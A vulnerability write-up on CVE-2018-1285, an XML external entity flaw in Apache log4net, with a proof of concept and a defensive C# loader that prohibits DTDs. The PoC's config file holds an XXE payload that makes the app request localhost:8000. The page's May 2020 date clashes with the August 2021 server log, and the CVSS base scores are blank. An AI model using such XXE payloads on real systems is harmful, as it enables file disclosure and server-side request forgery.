CVE-2018-1285
Date: May 11, 2020
Overview
Apache log4net is an open-source logging library that lets developers send log statements to a wide range of logging targets flexibly and quickly. It is configured through an XML configuration file that is easy to read and update. In affected versions, an attacker who can supply or modify that configuration file can inject malicious XML, including external entity declarations, and harm the application.

Details
CVE-2018-1285 exists because of how log4net parses its XML configuration files: the parser is permitted to process XML external entities. If external entity processing is not disabled when the configuration file is parsed, an attacker who controls the file can use it as an attack vector.

The attacker declares an external entity in a Document Type Definition (DTD) at the top of the configuration file and references it in the document body. The XML parser resolves the entity and embeds the fetched content into the document it builds. Depending on what the entity points at, this lets the attacker read local files into the parsed document (exposing sensitive data), make the application issue requests to attacker-chosen hosts, cause a denial of service, or produce other system impacts.

This class of attack is known as an XXE attack, short for "XML eXternal Entity" attack.
PoC Details
Environment:
.NET Framework 4
log4net 2.0.8
Python 3.9.1
Below is a simple .NET Framework application that uses log4net to log an informational message.
The application reads its configuration from a log4net.config file. That file carries a DTD declaring an external entity that points at an arbitrary URL; when the parser resolves the entity, the application issues an HTTP request to that address (for demonstration purposes, "localhost" on port 8000).
Set up a simple Python HTTP server listening on port 8000 on "localhost" (8000 is the default port of python -m http.server).
Now build and run the application. A new request arrives at the Python server, proving SSRF through XXE: the configuration parser fetched the external entity on the application's behalf.
PoC Code
// Program.cs - the application
using System.IO;
using System.Reflection;
using log4net;
using log4net.Config;

namespace CVE_2018_1285
{
    class Program
    {
        private static readonly ILog log = LogManager.GetLogger(typeof(Program));

        static void Main(string[] args)
        {
            var logRepository = LogManager.GetRepository(Assembly.GetEntryAssembly());
            // log4net.config is resolved relative to the working directory;
            // the vulnerable parser resolves the external entity while loading it.
            XmlConfigurator.Configure(logRepository, new FileInfo("log4net.config"));
            log.Info("Info");
        }
    }
}

// log4net.config content:
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "http://localhost:8000/">
]>
<foo>&xxe;</foo>
// for simple python server, on cmd:
> python -m http.server
// When running the built application, the following request is logged at the server side:
::1 - - [24/Aug/2021 10:18:48] "GET / HTTP/1.1" 200
Affected Environments
Apache log4net versions before 2.0.10

Remediation
Do not permit arbitrary configuration files to be specified by untrusted users.
Disable DTD processing completely when parsing configuration files.

Prevention
Update to log4net version 2.0.10 or higher.

Language: C#
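The following C# is an added example; it is not code from the PoC above or from the log4net project. It shows one way to apply the "disable DTDs" remediation in an application that cannot yet move to log4net 2.0.10: parse the configuration file yourself with an XmlReader that prohibits DTDs and has no resolver, then hand the already-parsed element to XmlConfigurator's existing Configure(ILoggerRepository, XmlElement) overload so log4net never reads the raw file. Run against the PoC's log4net.config, the reader throws an XmlException at the <!DOCTYPE> line and no request reaches port 8000; a clean config with a <log4net> root element loads as before. The class name SafeLog4netLoader, the method LoadConfigSafely and the path "log4net.config" are assumptions for the example.

```csharp
using System;
using System.IO;
using System.Reflection;
using System.Xml;
using log4net;
using log4net.Config;
using log4net.Repository;

namespace CVE_2018_1285
{
    // Hypothetical helper: loads a log4net XML config with DTDs prohibited.
    static class SafeLog4netLoader
    {
        // Returns true when log4net was configured, false when the file was rejected.
        public static bool LoadConfigSafely(ILoggerRepository repository, string path)
        {
            var settings = new XmlReaderSettings
            {
                DtdProcessing = DtdProcessing.Prohibit, // any <!DOCTYPE> is a parse error
                XmlResolver = null                      // never fetch external resources
            };

            var doc = new XmlDocument();
            doc.XmlResolver = null; // no resolver on the DOM side either

            try
            {
                using (var reader = XmlReader.Create(path, settings))
                {
                    doc.Load(reader);
                }
            }
            catch (XmlException ex)
            {
                // The PoC config fails here: .NET reports that DTD is prohibited
                // in this document, before any entity could be resolved.
                Console.Error.WriteLine("Rejected log4net config '{0}': {1}", path, ex.Message);
                return false;
            }

            // Hand the pre-parsed <log4net> root element to log4net. This overload
            // exists in log4net and does not re-read the file.
            XmlConfigurator.Configure(repository, doc.DocumentElement);
            return true;
        }
    }

    class Program
    {
        private static readonly ILog log = LogManager.GetLogger(typeof(Program));

        static void Main(string[] args)
        {
            var repo = LogManager.GetRepository(Assembly.GetEntryAssembly());
            if (!SafeLog4netLoader.LoadConfigSafely(repo, "log4net.config"))
            {
                // Fail closed: do not start with a logging configuration we could not trust.
                Environment.Exit(1);
            }
            log.Info("Info");
        }
    }
}
```

This only covers the standalone-file path used in the PoC; a config embedded in app.config still goes through the application's own configuration loader and must be protected the same way. Failing closed is deliberate: silently continuing without logging hides the fact that someone tampered with the file.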
Good to know:

CVSS v3 metrics

| Metric | Value |
|---|---|
| Base Score | |
| Attack Vector (AV) | Network |
| Attack Complexity (AC) | Low |
| Privileges Required (PR) | None |
| User Interaction (UI) | None |
| Scope (S) | Unchanged |
| Confidentiality (C) | High |
| Integrity (I) | High |
| Availability (A) | High |

CVSS v2 metrics

| Metric | Value |
|---|---|
| Base Score | |
| Access Vector (AV) | Network |
| Access Complexity (AC) | Low |
| Authentication (AU) | None |
| Confidentiality (C) | Partial |
| Integrity (I) | Partial |
| Availability (A) | Partial |